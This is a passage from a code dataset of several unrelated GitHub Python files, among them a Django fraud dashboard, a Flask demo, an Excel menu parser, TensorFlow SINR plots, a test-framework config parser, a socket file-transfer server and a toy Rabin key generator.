x_y=FRAUD_YES['order_date'].values.tolist()\n y_y=FRAUD_YES['resolution_count'].values.tolist()\n\n return x_n,y_n,x_y,y_y\n\ndef fraud_inspector_option_city():\n option_citys=apps.get_model('fraud_inspector','option_city')\n 
option_city=option_citys.objects.all()\n    option_city=option_city.values_list()\n    return option_city\n\n\n\nclass per_fraud_inspector():\n    option_city = fraud_inspector_option_city()\n    \n\n\n\nlabels = {'Point 1': (3.5,5), 'Point 2': (1.5,2), 'Point 3': (3.5,8)}\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css','//cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css']\n\napp = DjangoDash('Fraf_dash_fols')\n\n\napp.layout = html.Div([\n    dcc.Dropdown(id='city',\n        options=[{'label': i[1], 'value': i[2]} for i in fraud_inspector_option_city()]\n        ,multi=True,value='0'),\n    dcc.DatePickerRange(id='input1',display_format='Y-M-D',start_date=(datetime.now()- timedelta(days=30)).strftime('%Y-%m-%d'),\n        end_date=datetime.now().strftime('%Y-%m-%d'),clearable=True,with_portal=True,), \n    html.Button('Загрузка', id='button',style={'height': 47}),\n    html.Div(id='output-container-button',\n             children='Enter a value and press submit')\n])\n\n\n@app.callback(\n    dash.dependencies.Output('output-container-button', 'children'),\n    [dash.dependencies.Input('button', 'n_clicks')],\n    [dash.dependencies.State('city', 'value'),\n    dash.dependencies.State('input1', 'start_date'),\n    dash.dependencies.State('input1', 'end_date')])\ndef update_output(n_clicks,city ,start_date,end_date):\n    try:\n        city=list(city)\n    except:\n        pass \n    if len(city)==0:\n        return \"Город не выбран\"\n    if n_clicks==None:\n        return\n    else:\n        if start_date is None:\n            return \"Проверить дату\"\n        elif end_date is None: \n            return \"Проверить дату\"\n        else: \n            x_n,y_n,x_y,y_y=fraud_inspector_FraudOrders(city ,start_date,end_date)\n            return html.Div([\n                dcc.Graph(\n                    figure=dict(\n                        data=[\n                            dict(\n                                x=x_n,\n                                y=y_n,\n                                name='НЕ ФРОД',\n                                marker=go.bar.Marker(\n                                    color='rgb(55, 83, 109)'\n                                )\n                            ),\n                            dict(\n                                x=x_y,\n                                y=y_y,\n                                name='ФРОД',\n                                marker=go.bar.Marker(\n                                    color='rgb(26, 118, 255)'\n                                )\n                            )\n                        ],\n                        layout=dict(\n                            title='FRAUD',\n                            showlegend=True,\n                            legend=go.layout.Legend(\n                                x=0,\n                                y=1.0\n                            ),\n                            margin=dict(l=40, r=0, t=40, b=30)\n                        )\n                    ),\n                    style={'height': 500},\n                    id='my-graph'\n                ) \n \n            ],style={'height': 800}) \n\n\n","repo_name":"avengerSAT/anti_fraud_pub","sub_path":"fraud_inspector/plotly_apps/dash_Graf.py","file_name":"dash_Graf.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13819617959","text":"from flask import Flask\nfrom flask import render_template, jsonify\n\napp = Flask(__name__)\n\n@app.route('/data_json')\ndef data_json():\n    dummy_data = [\n        {\n            \"id\": 1,\n            \"starting_time\": \"16:00\",\n            \"team_a\": \"Random Team 1\",\n            \"score\": \"1 - 2\",\n            \"team_b\": \"Random Team 2\",\n            \"minute\": \"01:00\",\n        },\n        {\n            \"id\": 2,\n            \"starting_time\": \"18:00\",\n            \"team_a\": \"Random Team 3\",\n            \"score\": \"1 - 1\",\n            \"team_b\": \"Random Team 4\",\n            \"minute\": \"05:00\",\n        },\n    ]\n    return jsonify(dummy_data)\n\n@app.route('/')\ndef index():\n    dummy_data = data_json()\n    return render_template(\n        'index.html',\n        matches=dummy_data.json,\n    )","repo_name":"jimdevops19/LiveSportsWebsite","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"17238565099","text":"# coding=utf-8\nimport logging\nfrom methods.excel import xlrd\nfrom models import MenuCategory, MenuItem, GroupModifier, GroupModifierChoice\n\n__author__ = 'dvpermyakov'\n\n\ndef menu_parse(file_excel):\n    wb 
= xlrd.open_workbook(file_contents=file_excel)\n sh = wb.sheet_by_index(0)\n categories = {}\n products = {}\n group_modifiers = {}\n group_choices = {}\n for row_number in range(sh.nrows):\n if row_number > 0:\n current_category = MenuCategory()\n current_item = MenuItem()\n current_modifier = GroupModifier()\n current_choice = GroupModifierChoice()\n item_add = True\n for index, cell in enumerate(sh.row_values(row_number)):\n if index == 0:\n current_category.sequence_number = int(cell)\n current_item.sequence_number = int(cell)\n elif index == 1:\n if categories.get(cell):\n current_category = categories[cell]\n else:\n current_category.title = cell\n categories[cell] = current_category\n elif index == 2:\n if products.get(cell):\n current_item = products[cell]\n item_add = False\n else:\n current_item.title = cell\n products[cell] = current_item\n elif index == 3:\n if item_add:\n current_item.description = cell\n elif index == 4 and cell:\n if item_add:\n current_item.price = int(float(cell) * 100)\n elif index == 5:\n if item_add and cell:\n current_item.volume = float(cell)\n elif index == 6:\n if item_add and cell:\n current_item.weight = float(cell)\n elif index == 7:\n if item_add and cell:\n current_item.kal = int(cell)\n elif index == 8:\n if cell:\n if group_modifiers.get(cell):\n current_modifier = group_modifiers[cell]\n else:\n current_modifier.title = cell\n group_modifiers[cell] = current_modifier\n elif index == 9:\n if cell:\n current_choice.title = cell\n elif index == 10:\n if cell or cell == 0:\n current_choice.price = int(float(cell) * 100)\n key = '%s_%s' % (current_choice.title, current_choice.price)\n if group_choices.get(key):\n current_choice = group_choices[key]\n else:\n current_choice.choice_id = GroupModifierChoice.generate_id()\n group_choices[key] = current_choice\n if current_choice not in current_modifier.choices:\n current_modifier.choices.append(current_choice)\n current_choice.put()\n logging.info(current_modifier)\n if current_modifier.title:\n current_modifier.put()\n if current_modifier.key not in current_item.group_modifiers:\n current_item.group_modifiers.append(current_modifier.key)\n current_item.put()\n if item_add:\n current_item.category = current_category.key\n current_category.put()","repo_name":"lopatinsky/automation-gae","sub_path":"methods/excel/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3424581022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 29 19:56:46 2020\n\n@author: nikbakht\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nclass Plot():\n def __init__(self,Nap,Nuser,**kwargs):\n super(Plot, self).__init__(**kwargs)\n self.Nap = Nap\n self.Nuser = Nuser\n def cdfplot(self, x):\n fig, ax = plt.subplots(1, 1)\n for i in range(len(x)):\n qe, pe = self.ecdf(10 * np.log10(x[i].flatten()))\n ax.plot(qe, pe, lw=2, label=str(i))\n\n # ax.hold(True)\n\n ax.set_xlabel('(SINR)dB')\n ax.set_ylabel('CDF')\n ax.legend(fancybox=True, loc='right')\n # plt.xlim([-10,30])\n plt.ylim([0, 1])\n plt.show()\n def ecdf(self,sample):\n # convert sample to a numpy array, if it isn't already\n sample = np.atleast_1d(sample)\n # find the unique values and their corresponding counts\n quantiles, counts = np.unique(sample, return_counts=True)\n \n # take the cumulative sum of the counts and divide by the sample size to\n # get the cumulative probabilities 
between 0 and 1\n cumprob = np.cumsum(counts).astype(np.double) / sample.size\n return quantiles, cumprob\n def sinr(self,SNR,p):\n Hloop =100\n Hreal = tf.random.normal([SNR.shape[0], self.Nap, self.Nuser, Hloop])\n Himag = tf.random.normal([SNR.shape[0], self.Nap, self.Nuser, Hloop])\n H = 1 / np.sqrt(2.0) * (tf.complex(Hreal, Himag))\n Habs = tf.math.abs(H)\n Habs = tf.cast(tf.math.real(Habs), 'float32')\n gain = tf.tile(tf.expand_dims(SNR,axis=3),[1,1,1,Hloop])* tf.math.square(Habs)\n num = tf.expand_dims(p,axis=2)*tf.square(tf.reduce_sum(gain,axis=1))\n\n SNR_c = tf.expand_dims(tf.complex(tf.math.sqrt(SNR),0.0),axis=3)\n gain_c_conj = tf.reshape(SNR_c*tf.math.conj(H),[H.shape[0]*Hloop,self.Nap,self.Nuser])\n gain_c = tf.reshape(SNR_c*H,[H.shape[0]*Hloop,self.Nap,self.Nuser])\n\n cross_gain = tf.linalg.matmul(gain_c_conj,gain_c,transpose_a=True)\n cross_gain = tf.math.real(tf.math.square(tf.math.abs(cross_gain)))\n p = tf.reshape(tf.tile(tf.expand_dims(p,axis=2),[1,1,Hloop]),[-1,self.Nuser,1])\n denom = tf.squeeze(tf.linalg.matmul(cross_gain,p))\n denom = denom -tf.linalg.diag_part(cross_gain)*tf.squeeze(p)\n denom = tf.reshape(denom,[H.shape[0],self.Nuser,Hloop])\n denom_noise = tf.reduce_sum(gain,axis=1)\n SINR = tf.reduce_mean(num/(denom+denom_noise),axis=2)\n return SINR\n\n def sinr_averaged_fading(self,SNR, p):\n Hloop = 100\n num = tf.zeros([SNR.shape[0], Hloop], dtype='float64')\n denom = tf.zeros(num.shape, dtype='float64')\n denomCI = tf.zeros(num.shape, dtype='float64')\n denomCH = tf.zeros(num.shape, dtype='float64')\n deonNoise = tf.zeros(num.shape, dtype='float64')\n TotalCI = tf.zeros([SNR.shape[0], self.Nuser, Hloop], dtype='float64')\n\n H = 1 / np.sqrt(2) * (np.random.randn(SNR.shape[0], self.Nap, self.Nuser, Hloop) +\n 1j * np.random.randn(SNR.shape[0], self.Nap, self.Nuser,Hloop))\n H = np.sqrt(np.tile(np.expand_dims(SNR / (1 + SNR), axis=3), [1, 1, 1, Hloop])) * H\n H = H.astype('complex64')\n SINR = np.zeros([SNR.shape[0], self.Nuser], dtype='float64')\n\n for k in range(int(self.Nuser)):\n num = (tf.tile(p[:, [k]], [1, Hloop]) * tf.square(tf.abs(np.sum(\n tf.tile(SNR[:, :, [k]], [1, 1, Hloop]) * np.square(np.abs(H[:, :, k, :])), axis=1))))\n\n TotalCI = (tf.tile(tf.expand_dims(p, axis=2), [1, 1, Hloop]) * np.square(\n np.abs(np.sum(np.tile(np.conj(H[:, :, [k], :]), [1, 1, self.Nuser, 1]) *\n np.tile(np.sqrt(tf.expand_dims(SNR[:, :, [k]], axis=3)), [1, 1, self.Nuser, Hloop]) * (\n H) * np.tile(np.sqrt(tf.expand_dims(SNR, axis=3)), [1, 1, Hloop])\n , axis=1))))\n\n denomCI = np.sum(TotalCI, axis=1) - TotalCI[:, k, :]\n\n denomCH = tf.reduce_sum(\n tf.multiply(tf.multiply(tf.tile(SNR[:, :, [k]], [1, 1, Hloop]), tf.square(tf.abs(H[:, :, k, :]))),\n tf.tile(tf.reduce_sum(\n tf.multiply(tf.tile(tf.expand_dims(p, axis=1), [1, self.Nap, 1]), tf.divide(SNR, 1 + SNR)),\n axis=2, keepdims=True), [1, 1, Hloop]))\n , axis=1)\n denomNoise = tf.reduce_sum(\n tf.multiply(tf.tile(SNR[:, :, [k]], [1, 1, Hloop]), tf.square(tf.abs(H[:, :, k, :]))), axis=1)\n\n denom = denomCI + denomCH + denomNoise\n SINR[:, [k]] = np.expand_dims(np.mean(num / denom, axis=1), axis=1)\n\n # Cost=Cost+(tf.reduce_sum(tf.exp(-10*p),axis=1))\n # Cost=tf.reduce_sum(tf.exp(-1*p),axis=1)\n # +100*tf.square(tf.norm(p,ord='euclidean',axis=1)-1)\n return 
SINR\n\n","repo_name":"RasoulNik/UnsupervisedNN","sub_path":"Cell-free/Plot_results_uplink.py","file_name":"Plot_results_uplink.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"3015141592","text":"def is_prime(n):\n\tif n == 2:\n\t\treturn True\n\telif n%2 == 0 or n <= 1:\n\t\treturn False\n\telse:\n\t\timport math\n\t\tfor d in range(3, int(math.sqrt(n))+1, 2):\n\t\t\tif n % d == 0:\n\t\t\t\treturn False\n\t\treturn True\n\nlooping = True\ne = 2\nnth = 1\nwhile looping:\n\tif nth < 1001:\n\t\tif is_prime(e):\n\t\t\tif nth % 10 == 0:\n\t\t\t\tprint(e)\n\t\t\t\tnth += 1\n\t\t\t\te += 1\n\t\t\telse:\n\t\t\t\tprint(\"{}\".format(e)+\" \"*(5-len(str(e))), end=\"\")\n\t\t\t\tnth += 1\n\t\t\t\te += 1\n\t\telse:\n\t\t\te += 1\n\telse:\n\t\tlooping = False\n","repo_name":"sp0002/cp2019","sub_path":"p03/q5_determine_prime.py","file_name":"q5_determine_prime.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32297994791","text":"import os\nimport platform\nimport re\nfrom optparse import OptionParser, OptionGroup\n\nfrom typing import List\n\nfrom . import __version__\n\n_properties = {}\n_options = {}\n\n\ndef get_option(option: str) -> str:\n try:\n return _options[option]\n except KeyError:\n return None\n\n\ndef get_property(key: str, default: str = None) -> str:\n \"\"\"\n Get property value.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return _properties[key]\n except KeyError:\n return default\n\n\ndef get_int_property(key: str, default: int = None) -> int:\n \"\"\"\n Get property value and convert it to int.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return int(_properties[key])\n except KeyError:\n return default\n\n\ndef get_float_property(key: str, default: float = None) -> float:\n \"\"\"\n Get property value and convert it to float.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return float(_properties[key])\n except KeyError:\n return default\n\n\ndef get_boolean_property(key: str, default: bool = None) -> bool:\n \"\"\"\n Get property value and convert it to boolean.\n If no property found, default value will be returned.\n \"\"\"\n try:\n value = _properties[key]\n if value.lower() == \"true\":\n return True\n elif value.lower() == \"false\":\n return False\n raise ValueError(\"could not convert string to boolean: %s\" % value)\n except KeyError:\n return default\n\n\ndef get_list_property(key: str, default: List[str] = None, sep: str = \",\") -> List[str]:\n \"\"\"\n Get property value and convert it to list.\n If no property found, default value will be returned.\n \"\"\"\n try:\n return _properties[key].split(sep)\n except KeyError:\n return default\n\n\ndef load(args):\n option_args, property_args = __load_args(args)\n _parse_options(option_args)\n _load_properties_from_file()\n _parse_properties(property_args)\n\n\ndef _load_properties_from_file():\n property_file = get_option(\"property_file\")\n if property_file is not None:\n file_object = open(property_file, encoding=\"utf-8\")\n try:\n property_regex_str = r\"^([^;#].*?)=(.*?)$\"\n property_regex = re.compile(property_regex_str)\n for line in file_object:\n property_match = property_regex.search(line.strip())\n if property_match:\n _properties[property_match.group(1)] = property_match.group(2)\n finally:\n 
file_object.close()\n\n\ndef __load_args(args):\n    property_args = []\n    option_args = []\n    property_regex_str = r\"^-D(.*?)=(.*?)$\"  # the format of property definition must be -D<key>=<value>\n    property_regex = re.compile(property_regex_str)\n    for arg in args:\n        property_match = property_regex.search(arg)\n        if property_match:\n            property_args.append(arg)\n        else:\n            option_args.append(arg)\n    return option_args, property_args\n\n\ndef _parse_properties(property_args):\n    property_regex_str = r\"^-D(.*?)=(.*?)$\"  # the format of property definition must be -D<key>=<value>\n    property_regex = re.compile(property_regex_str)\n    for arg in property_args:\n        property_match = property_regex.search(arg)\n        _properties[property_match.group(1)] = property_match.group(2)\n\n\ndef _parse_options(option_args):\n    parser = OptionParser(usage=\"ptest [options] [properties]\", version=\"ptest %s for Python %s\" % (__version__, platform.python_version()),\n                          description=\"ptest is a light test framework for Python.\")\n\n    # path and property\n    parser.add_option(\"-w\", \"--workspace\", action=\"store\", dest=\"workspace\", default=\".\", metavar=\"dir\",\n                      help=\"Specify the workspace dir (relative to working directory). Default is current working directory.\")\n    parser.add_option(\"-P\", \"--python-paths\", action=\"store\", dest=\"python_paths\", default=None, metavar=\"paths\",\n                      help=\"Specify the additional locations (relative to workspace) where to search test libraries from when they are imported. \"\n                           \"Multiple paths can be given by separating them with a comma.\")\n    parser.add_option(\"-p\", \"--property-file\", action=\"store\", dest=\"property_file\", default=None, metavar=\"file\",\n                      help=\"Specify the .ini property file (relative to workspace). \"\n                           \"The properties in property file will be overwritten by user defined properties in cmd line. \"\n                           \"Get property via get_property() in module ptest.config.\")\n\n    # running\n    parser.add_option(\"-R\", \"--run-failed\", action=\"store\", dest=\"run_failed\", default=None, metavar=\"file\",\n                      help=\"Specify the xunit result xml path (relative to workspace) and run the failed/skipped test cases in it.\")\n    parser.add_option(\"-t\", \"--targets\", action=\"store\", dest=\"test_targets\", default=None, metavar=\"targets\",\n                      help=\"Specify the path of test targets, separated by comma. Test target can be package/module/class/method. \"\n                           \"The target path format is: package[.module[.class[.method]]] \"\n                           \"NOTE: ptest ONLY searches modules under --workspace, --python-paths and sys.path\")\n    parser.add_option(\"-f\", \"--filter\", action=\"store\", dest=\"test_filter\", default=None, metavar=\"class\",\n                      help=\"Specify the path of test filter class, select test cases to run by the specified filter. \"\n                           \"The test filter class should implement class TestFilter in ptest.testfilter \"\n                           \"The filter path format is: package.module.class \"\n                           \"NOTE: ptest ONLY searches modules under --workspace, --python-paths and sys.path\")\n    parser.add_option(\"-i\", \"--include-tags\", action=\"store\", dest=\"include_tags\", default=None, metavar=\"tags\",\n                      help=\"Select test cases to run by tags, separated by comma.\")\n    parser.add_option(\"-e\", \"--exclude-tags\", action=\"store\", dest=\"exclude_tags\", default=None, metavar=\"tags\",\n                      help=\"Select test cases not to run by tags, separated by comma. 
These test cases are not run even if included with --include-tags.\")\n    parser.add_option(\"-g\", \"--include-groups\", action=\"store\", dest=\"include_groups\", default=None, metavar=\"groups\",\n                      help=\"Select test cases to run by groups, separated by comma.\")\n    parser.add_option(\"-n\", \"--test-executor-number\", action=\"store\", dest=\"test_executor_number\", metavar=\"int\",\n                      default=1, help=\"Specify the number of test executors. Default value is 1.\")\n\n    # output\n    parser.add_option(\"-o\", \"--output-dir\", action=\"store\", dest=\"output_dir\", default=\"test-output\", metavar=\"dir\",\n                      help=\"Specify the output dir (relative to workspace).\")\n    parser.add_option(\"-r\", \"--report-dir\", action=\"store\", dest=\"report_dir\", default=\"html-report\", metavar=\"dir\",\n                      help=\"Specify the html report dir (relative to output dir).\")\n    parser.add_option(\"-x\", \"--xunit-xml\", action=\"store\", dest=\"xunit_xml\", default=\"xunit-results.xml\",\n                      metavar=\"file\", help=\"Specify the xunit result xml path (relative to output dir).\")\n\n    # miscellaneous\n    parser.add_option(\"-l\", \"--listeners\", action=\"store\", dest=\"test_listeners\", default=None, metavar=\"class\",\n                      help=\"Specify the path of test listener classes, separated by comma. \"\n                           \"The listener class should implement class TestListener in ptest.plistener \"\n                           \"The listener path format is: package.module.class \"\n                           \"NOTE: 1. ptest ONLY searches modules under --workspace, --python-paths and sys.path \"\n                           \"2. The listener class must be thread safe if you set -n(--test-executor-number) greater than 1.\")\n    parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False,\n                      help=\"Set ptest console to verbose mode.\")\n    parser.add_option(\"--temp\", action=\"store\", dest=\"temp\", default=\"ptest-temp\", metavar=\"dir\",\n                      help=\"Specify the temp dir (relative to workspace).\")\n    parser.add_option(\"--disable-screenshot\", action=\"store_true\", dest=\"disable_screenshot\", default=False,\n                      help=\"Disable taking screenshot for preporter.\")\n\n    # tool\n    parser.add_option(\"-m\", \"--merge-xunit-xmls\", action=\"store\", dest=\"merge_xunit_xmls\", default=None, metavar=\"files\",\n                      help=\"Merge the xunit result xmls (relative to workspace). Multiple files can be given by separating them with a comma.\"\n                           \"Use --to to specify the path of merged xunit result xml.\")\n    parser.add_option(\"--to\", action=\"store\", dest=\"to\", default=None, metavar='path',\n                      help=\"Specify the 'to' destination (relative to workspace).\")\n\n    # user defined properties\n    parser.add_option_group(\n        OptionGroup(parser, \"User defined properties\",\n                    \"Define properties via -D<key>=<value>. 
Get defined property via get_property() in module ptest.config.\"))\n\n options, unknown_args = parser.parse_args(option_args)\n\n # only one of the main options can be specified\n main_options = [options.test_targets, options.run_failed, options.merge_xunit_xmls]\n specified_options_count = len([option for option in main_options if option is not None])\n if specified_options_count == 0:\n parser.error(\"You must specify one of the following options: -t(--targets), -R(--run-failed), -m(--merge-xunit-xmls).\")\n elif specified_options_count > 1:\n parser.error(\"You can ONLY specify one of the following options: -t(--targets), -R(--run-failed), -m(--merge-xunit-xmls).\")\n\n # check '--to'\n if options.merge_xunit_xmls is not None and options.to is None:\n parser.error(\"You must use --to to specify the path of merged xunit result xml (--merge-xunit-xmls).\")\n\n # spilt multiple values by comma\n def split(option_value):\n return None if option_value is None else option_value.split(\",\")\n\n options.python_paths = split(options.python_paths)\n options.test_targets = split(options.test_targets)\n options.include_tags = split(options.include_tags)\n options.exclude_tags = split(options.exclude_tags)\n options.include_groups = split(options.include_groups)\n options.test_listeners = split(options.test_listeners)\n options.merge_xunit_xmls = split(options.merge_xunit_xmls)\n\n # convert to full path for options\n def join_path(base_path, sub_path):\n return os.path.abspath(os.path.join(base_path, sub_path))\n\n options.workspace = join_path(os.getcwd(), options.workspace)\n options.python_paths = None if options.python_paths is None else [join_path(options.workspace, path) for path in options.python_paths]\n options.property_file = None if options.property_file is None else join_path(options.workspace, options.property_file)\n\n options.run_failed = None if options.run_failed is None else join_path(options.workspace, options.run_failed)\n options.output_dir = join_path(options.workspace, options.output_dir)\n options.report_dir = join_path(options.output_dir, options.report_dir)\n options.xunit_xml = join_path(options.output_dir, options.xunit_xml)\n options.temp = join_path(options.workspace, options.temp)\n\n options.merge_xunit_xmls = None if options.merge_xunit_xmls is None else [join_path(options.workspace, path) for path in\n options.merge_xunit_xmls]\n options.to = None if options.to is None else join_path(options.workspace, options.to)\n\n _options.update(options.__dict__)\n","repo_name":"KarlGong/ptest","sub_path":"ptest/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"11979445450","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\n\nfrom apps.users.models import User\n\n\n@admin.register(User)\nclass UserAdmin(BaseUserAdmin):\n list_display = (\n \"id\",\n \"email\",\n \"username\",\n \"first_name\",\n \"last_name\",\n \"is_owner\",\n \"is_active\",\n \"last_login\",\n )\n list_editable = (\"is_active\", \"is_owner\")\n list_filter = (\"is_active\",)\n search_fields = (\"email\", \"first_name\", \"last_name\", \"username\")\n ordering = (\"email\",)\n list_display_links = 
(\"email\",)\n","repo_name":"maxxw211/sft-backend","sub_path":"apps/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28869288415","text":"import socket\nimport os\n\ndef sendFile(sock):\n filename = sock.recv(1024).decode('utf-8')\n# print(\"File Name is:\" + filename)\n\n if (os.path.isfile(filename)):\n# print('File is present.')\n message = \"EXISTS\" + str(os.path.getsize(filename))\n sock.send(message.encode('utf-8'))\n\n with open(filename,'rb') as f:\n# print(\"Opened the file\")\n bytesToSend = f.read(1024)\n sock.send(bytesToSend)\n while f.read(1):\n f.seek(-1,1)\n bytesToSend = f.read(1024)\n sock.send(bytesToSend)\n f.close()\n# print('Closed the file')\n else:\n message = \"Error\"\n sock.send(message.encode('utf-8'))\n sock.close()\n print(\"Returning from function\")\n\n\ndef Main():\n host='127.0.0.1'\n port = 1000\n\n s = socket.socket()\n s.bind((host,port))\n s.listen(5)\n\n os.chdir(\"C:\\Shrini\\Python_Practice\\Project2\\Destination_path\")\n print(\"Server is Listing\")\n\n while True:\n print(\"Inside while loop\")\n c, addr = s.accept()\n print(\"Client connected \" + str(addr))\n sendFile(c)\n print(\"At end of while loop\")\n \n s.close()\n\nif __name__ == '__main__':\n Main()\n","repo_name":"shrinivas-ankam/Python_File_Transfer_Application","sub_path":"FileTransfer.py","file_name":"FileTransfer.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5737542641","text":"from PIL import Image#, ImagePalette\nimport os, sys\n# for each file in the argument list, take off the file extension, and replace with \"_satconv.tga\"\n# clear the bottom three bits for all channel intensities in the image\nif __name__ == '__main__':\n for infile in sys.argv[1:]:\n f, e = os.path.splitext(infile) \n outfile = f + \"_satconv.tga\"\n try:\n with Image.open(infile) as im:\n out = im.point(lambda p: p & 248)\n # pal1 = ImagePalette.ImagePalette(mode ='RGB', palette = None, size = 0)\n # out = im.quantize(colors=16, palette=pal1)\n out.save(outfile)\n except OSError:\n print(\"cannot convert\", infile)","repo_name":"Team-Starlane/slideshow","sub_path":"!workfolder/eriks-rgb555-script.py","file_name":"eriks-rgb555-script.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19032867635","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n lgps_default_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Drop Channel\"),\n config_parameter='lgps.device_wizard.drop_default_channel',\n )\n\n hibernate_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Hibernate Channel\"),\n config_parameter='lgps.hibernate_device_wizard.default_channel',\n )\n\n subscription_hibernate_product_id = fields.Many2one(\n 'product.product',\n string=_(\"Default Hibernate Service\"),\n domain=[\n (\"recurring_invoice\", \"=\", True)\n ],\n config_parameter='lgps.device_wizard.hibernate_default_service',\n )\n\n subscription_hibernate_commercial_id = fields.Many2one(\n 'crm.team',\n string=_(\"Default Hibernate Commercial Team\"),\n config_parameter='lgps.device_wizard.hibernate_commercial_default',\n )\n\n 
subscription_hibernate_user_id = fields.Many2one(\n 'res.users',\n string=_(\"Default Hibernate Subscription User\"),\n config_parameter='lgps.device_wizard.hibernate_user_default',\n )\n\n subscription_hibernate_stage_id = fields.Many2one(\n 'sale.subscription.stage',\n string=_(\"Default Hibernate Subscription Stage\"),\n config_parameter='lgps.device_wizard.hibernate_default_subscription_stage',\n )\n\n subscription_hibernate_stage_id_currents = fields.Many2one(\n 'sale.subscription.stage',\n string=_(\"Default Hibernate Stage Current Subscriptions\"),\n config_parameter='lgps.device_wizard.hibernate_current_subscription_stage',\n )\n\n subscription_hibernate_default_price_list_id = fields.Many2one(\n 'product.pricelist',\n string=_(\"Default Hibernate Subscription Price List\"),\n config_parameter='lgps.device_wizard.hibernate_default_price_list_id',\n )\n\n subscription_hibernate_template_id = fields.Many2one(\n 'sale.subscription.template',\n string=_(\"Default Hibernate Template\"),\n config_parameter='lgps.device_wizard.hibernate_default_subscription_template',\n )\n\n replacement_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Replacements Channel\"),\n config_parameter='lgps.device_wizard.replacement_default_channel',\n )\n\n substitution_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Substitutions Channel\"),\n config_parameter='lgps.device_wizard.substitution_default_channel',\n )\n\n repairs_default_price_list_id = fields.Many2one(\n 'product.pricelist',\n string=_(\"Default Repairs Subscription Price List\"),\n config_parameter='lgps.device_wizard.repairs_default_price_list_id',\n )\n\n add_reactivation_channel_id = fields.Many2one(\n 'mail.channel',\n string=_(\"Default Add/Reactivation Channel\"),\n config_parameter='lgps.add_reactivation_device_wizard.default_channel',\n )\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n return res\n\n","repo_name":"intralix/lgps","sub_path":"lgps/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2273223451","text":"from random import randint\nfrom string import ascii_lowercase\n\n# Written by Ming Wei, Edited and Proofread by Charles\n\t\ndef isprime(number): # prime number checker based on primality test\n\tif number <= 1: # https://en.wikipedia.org/wiki/Primality_test\n\t\treturn False\n\telif number <=3:\n\t\treturn True\n\telif number % 2 == 0 or number % 3 == 0:\n\t\treturn False\n\ti = 5\n\twhile i * i <= number:\n\t\tif number % i == 0 or number % (i+2) == 0:\n\t\t\treturn False\n\t\ti += 6\n\treturn True\n\ndef gcd(a,b): # greatest common divisor based on euclid's algorithm\n\twhile b != 0: # https://en.wikipedia.org/wiki/Euclidean_algorithm\n\t\ti = a\n\t\ta = b\n\t\tb = i % b\n\treturn a\n\ndef key():\n\tp = randint(1003, 10000)\n\tq = randint(1003, 10000)\n\t\n\twhile p % 4 != 3 or q % 4 != 3 or not isprime(p) or not isprime(q): \n\t # make p and q prime and p%4=q%4=3\n\t\tif p % 4 != 3 or not isprime(p):\n\t\t\tp = randint(1003, 10000)\n\t\tif q % 4 != 3 or not isprime(q):\n\t\t\tq = randint(1003, 10000)\n\twhile p == q: #make p != q\n\t\tq = randint(1003, 10000)\n\t\tif q % 4 != 3 or not isprime(q):\n\t\t\tcontinue\n\t\t\t\n\tn = p*q\n\tprint('Your public key is :', n)\n\tprint('Your private keys are : 
